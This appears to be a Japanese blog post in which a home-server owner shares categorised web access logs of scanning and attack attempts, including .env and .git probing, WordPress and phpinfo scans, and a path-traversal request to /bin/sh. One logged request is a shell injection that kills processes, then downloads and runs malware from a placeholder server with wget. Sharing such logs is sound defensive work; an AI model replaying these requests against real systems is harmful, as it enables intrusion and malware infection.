🔒
自宅サーバーのアクセスログから読み取れる警戒すべき通信の記録
はじめに
自宅サーバーの運営をしていると、日々さまざまなアクセスログが残されます。中には、怪しい動きを示す通信も多くあります。この記事では、私の自宅サーバーのウェブサーバーに記録されていた、危険と思われるアクセスログの一部を共有します。
攻撃の可能性があるアクセスログ一覧
カテゴリ別に分けてあります。
情報収集目的、情報窃取
ip - - [09/Jan/2025:08:48:53 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.94 Safari/537.36" "-"
ip - - [09/Jan/2025:10:28:23 +0000] "GET /.env HTTP/1.1" 404 134 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8" "-"
ip - - [09/Jan/2025:09:39:50 +0000] "GET /.env HTTP/1.1" 404 134 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15" "-"
ip - - [09/Jan/2025:06:57:08 +0000] "GET /.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:10:45:38 +0000] "GET /.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 Keydrop" "-"
ip - - [09/Jan/2025:06:57:15 +0000] "GET /portal/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:17 +0000] "GET /env/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:20 +0000] "GET /api/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:23 +0000] "GET /app/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:25 +0000] "GET /dev/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:10:45:38 +0000] "GET /.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 Keydrop" "-"
ip - - [09/Jan/2025:10:28:23 +0000] "GET /.env HTTP/1.1" 404 134 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8" "-"
ip - - [09/Jan/2025:09:39:50 +0000] "GET /.env HTTP/1.1" 404 134 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15" "-"
ip - - [09/Jan/2025:08:06:23 +0000] "POST /dns-query HTTP/1.1" 404 162 "-" "-" "-"
ip - - [09/Jan/2025:05:36:05 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:12:24:00 +0000] "GET /.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; N850L Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-"
ip - - [09/Jan/2025:12:24:01 +0000] "GET /Demo/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)" "-"
ip - - [09/Jan/2025:12:24:01 +0000] "GET /DEMO/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 (.NET CLR 3.0.30618)" "-"
ip - - [09/Jan/2025:12:24:01 +0000] "GET /.env HTTP/1.1" 404 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-"
ip - - [09/Jan/2025:12:24:04 +0000] "GET /Dev/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36" "-"
ip - - [09/Jan/2025:12:24:04 +0000] "GET /DEV/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows NT 6.3; rv:52.0.1) Gecko/20100101 Firefox/52.0.1" "-"
ip - - [09/Jan/2025:12:24:05 +0000] "GET /Doc/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; Touch; ASU2JS)" "-"
ip - - [09/Jan/2025:12:24:05 +0000] "GET /DOC/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4" "-"
ip - - [09/Jan/2025:12:24:06 +0000] "GET /Docs/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "-"
ip - - [09/Jan/2025:12:24:07 +0000] "GET /DOCS/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)" "-"
ip - - [09/Jan/2025:12:24:07 +0000] "GET /Download/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20100101 Firefox/30.0 ZemanaAID/FFFF009F" "-"
ip - - [09/Jan/2025:12:24:08 +0000] "GET /Env/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (Linux; Android 4.4.4; Nexus 5 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.114 Mobile Safari/537.36" "-"
ip - - [09/Jan/2025:12:24:09 +0000] "GET /Html/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows; U; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.1.2 Safari/525.21" "-"
ip - - [09/Jan/2025:12:24:09 +0000] "GET /Inc/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24" "-"
ip - - [09/Jan/2025:12:24:10 +0000] "GET /Infos/ HTTP/1.1" 400 264 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.8) Gecko/20061213 Firefox/1.5.0.8" "-"
ip - - [09/Jan/2025:12:24:11 +0000] "GET /Lib/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9.2.1 like Mac OS X; en_US) AppleWebKit/1 (KHTML, like Gecko) Mobile/1 Safari/1 iPhone/1 EtsyInc/4.31 rv:43100.64.0" "-"
ip - - [09/Jan/2025:12:24:11 +0000] "GET /Library/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; C5170 Build/IML77) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-"
ip - - [09/Jan/2025:12:24:12 +0000] "GET /Logging/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" "-"
ip - - [09/Jan/2025:12:24:13 +0000] "GET /Media/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (X11; FreeBSD amd64; rv:43.0) Gecko/20100101 Firefox/43.0" "-"
ip - - [09/Jan/2025:12:24:13 +0000] "GET /Misc/.env HTTP/1.1" 400 264 "-" "Opera/5.12 (Windows NT 5.1; U) [de]" "-"
ip - - [09/Jan/2025:12:24:14 +0000] "GET /New/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR
2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; Alexa Toolbar)" "-"
ip - - [09/Jan/2025:12:24:16 +0000] "GET /Production/.env HTTP/1.1" 400 264 "-" "Opera/9.01 (X11; OpenBSD i386; U; en)" "-"
ip - - [09/Jan/2025:12:24:17 +0000] "GET /Public/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" "-"
ip - - [09/Jan/2025:12:24:18 +0000] "GET /Server/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUSMSNIP)" "-"
ip - - [09/Jan/2025:12:24:18 +0000] "GET /Shared/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; playbrytetoolbar_Playbryte)" "-"
ip - - [09/Jan/2025:12:24:19 +0000] "GET /Site/.env HTTP/1.1" 400 264 "-" "Opera/9.63 (Windows NT 6.0; U; cs) Presto/2.1.1" "-"
ip - - [09/Jan/2025:12:24:20 +0000] "GET /Stage/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16" "-"
ip - - [09/Jan/2025:12:24:20 +0000] "GET /Staging/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16" "-"
ip - - [09/Jan/2025:12:24:21 +0000] "GET /Upload/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; McAfee)" "-"
ip - - [09/Jan/2025:12:24:22 +0000] "GET /Vendor/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; LG-LS995 Build/JDQ39B) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2 Mobile Safari/534.30" "-"
ip - - [09/Jan/2025:12:24:22 +0000] "GET /Web/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASBJS; rv:11.0) like Gecko" "-"
不正ログイン試行
ip - - [09/Jan/2025:03:15:31 +0000] "GET /remote/login HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
ip - - [09/Jan/2025:03:15:31 +0000] "GET /vpn/index.html HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
ip - - [09/Jan/2025:03:15:31 +0000] "GET /login HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
ip - - [09/Jan/2025:03:15:32 +0000] "GET /vpn/index.html HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
ip - - [09/Jan/2025:08:07:20 +0000] "GET /carbon/admin/login.jsp HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "-"
ip - - [09/Jan/2025:08:07:20 +0000] "GET /carbon/admin/login.jsp HTTP/1.1" 400 666 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "-"
プロキシ攻撃
ip - - [09/Jan/2025:06:09:24 +0000] "CONNECT web.realsysadm.in:443 HTTP/1.1" 400 166 "-" "-" "-"
PHP
ip - - [09/Jan/2025:05:13:16 +0000] "GET /phpinfo HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:05:13:17 +0000] "GET /phpinfo.php HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:07:57:49 +0000] "GET /cgi-bin/php/login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36" "-"
ip - - [09/Jan/2025:07:56:34 +0000] "POST /cgi-bin/php/login_check.php HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
ip - - [09/Jan/2025:06:57:11 +0000] "GET /phpinfo HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:13 +0000] "GET /phpinfo.php HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:04:39:35 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 3107 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
ip - - [09/Jan/2025:12:24:15 +0000] "GET /Phpinfo.php HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Linux; U; Android 4.3; en-au; GT-I9300 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-"
ip - - [09/Jan/2025:12:24:15 +0000] "GET /PHPinfo.php HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "-"
ip - - [09/Jan/2025:12:24:16 +0000] "GET /PHPINFO.php HTTP/1.1" 400 666 "-" "Mozilla/5.0 (Linux; Android 6.0.1; SM-S327VL Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36" "-"
情報改ざん
ip - - [09/Jan/2025:04:27:28 +0000] "\x00\x00\xFF\x01\x00P\x00\x00\x00\x00\x80\x00\x00{\x22i\x22:10,\x22v\x22:\x2212.28.204\x22,\x22p\x22:1,\x22u\x22:\x220000000000000BEE2504C95B94662B261D37092152B09A169178480240002663\x22,\x22c\x22:\x22arm64-v8a ELE-AL00\x22}" 400 166 "-" "-" "-"
WordPress系
ip - - [09/Jan/2025:11:45:28 +0000] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:28 +0000] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:28 +0000] "GET //2020/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:28 +0000] "GET //2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:28 +0000] "GET //2021/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:29 +0000] "GET //shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:29 +0000] "GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:29 +0000] "GET //test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:29 +0000] "GET //site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:30 +0000] "GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:07:36:07 +0000] "GET /wp-json HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "ip (ipv6)"
ip - - [09/Jan/2025:07:36:08 +0000] "GET /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "ip (ipv6)"
ip - - [09/Jan/2025:07:36:06 +0000] "GET /wp-json HTTP/1.1" 404 134 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" "ip (ipv6)"
ip - - [09/Jan/2025:04:14:04 +0000] "GET /wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Core32.php HTTP/1.1" 404 196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "ip"
脆弱性悪用
ip - - [09/Jan/2025:06:20:25 +0000] "GET /actuator/gateway/routes HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
マルウェアダウンロード系
[ip] - - [10/Jan/2025:09:53:58 +0000] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/z/bin;cd+/tmp;rm+malware1+malware2;wget+http:/\x5C/[malware-server-ip]/malware1;chmod+777+malware1;./malware1+jaws;wget+http:/\x5C/[malware-server-ip]/malware2;chmod+777+malware2;./malware2+jaws HTTP/1.1" 404 134 "-" "KrebsOnSecurity" "-"
SOCK5系
ip - - [09/Jan/2025:03:14:07 +0000] "\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\x1C\x80\x94\x09Ja\xB2m\xF0\xAD\x87@\xE4\xEC\xBB\xF1\xAA@\xA56\xB6\xA1\x8D\xB1\xF3\xCCtUO\xFF\xE1$\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0'\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:03:14:07 +0000] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xAD\xCD\xD0Z\x0C\xC0\xEC\xC1\x11\xE0\xFD\xBD\xC9\x01\x91\x01\x02\x97\xEE\xD9\x80\x90\xFB\xCD\xE6\xB8Kz\x7F\xE86\x16 YT\x22\xDCa\x9Cs'\x0F\xD1\xE8od\x0F\x8C\x96p\xE1c\x05\xCC\xAD\x15V\xF8eX\xD8l[aq\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:08:07:56 +0000] "\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xD2R\xC7d\x83\xBB\xC6\xEB9{\x88$\xCD\x198\xAAK\x80dK\x0E\xC7?m~(\x85\x10\xF4\xE4G\xF3 \x05\xB82\xDD\xD6q\xC8^\xF3\x9E9\x1D\x9C\x9B?Oq\xA5p\x15T\xA8\xD74\x88t:\x80\x96nk\xF6\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0'\xC0" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:08:07:45 +0000] "\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xDE6,c\x93`\x82\xEE\x1D\xB0\xEFr\xEF\x13\xC9\xDA\xF1]x\xD7\xB1k\xEBcP\xA4\xE9\x85\xB6\xC1n\xBE &\x0B\xC8!\xFD\xF3\xD7\xE8\xC7@\x16\xE8\xCAO>\xE0\xD0\xDE\xEE$\x99\xB7\xE5\xCC\xD8!T\x0E\x14\x0B\x89\x1B\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0'\xC0" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:07:10:45 +0000] "\x05\x01\x00" 400 166 "-" "-" "-"
RCE (リモートコマンド実行系)
ip - - [11/Jan/2025:03:10:26 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 166 "-" "-" "-"
Discussion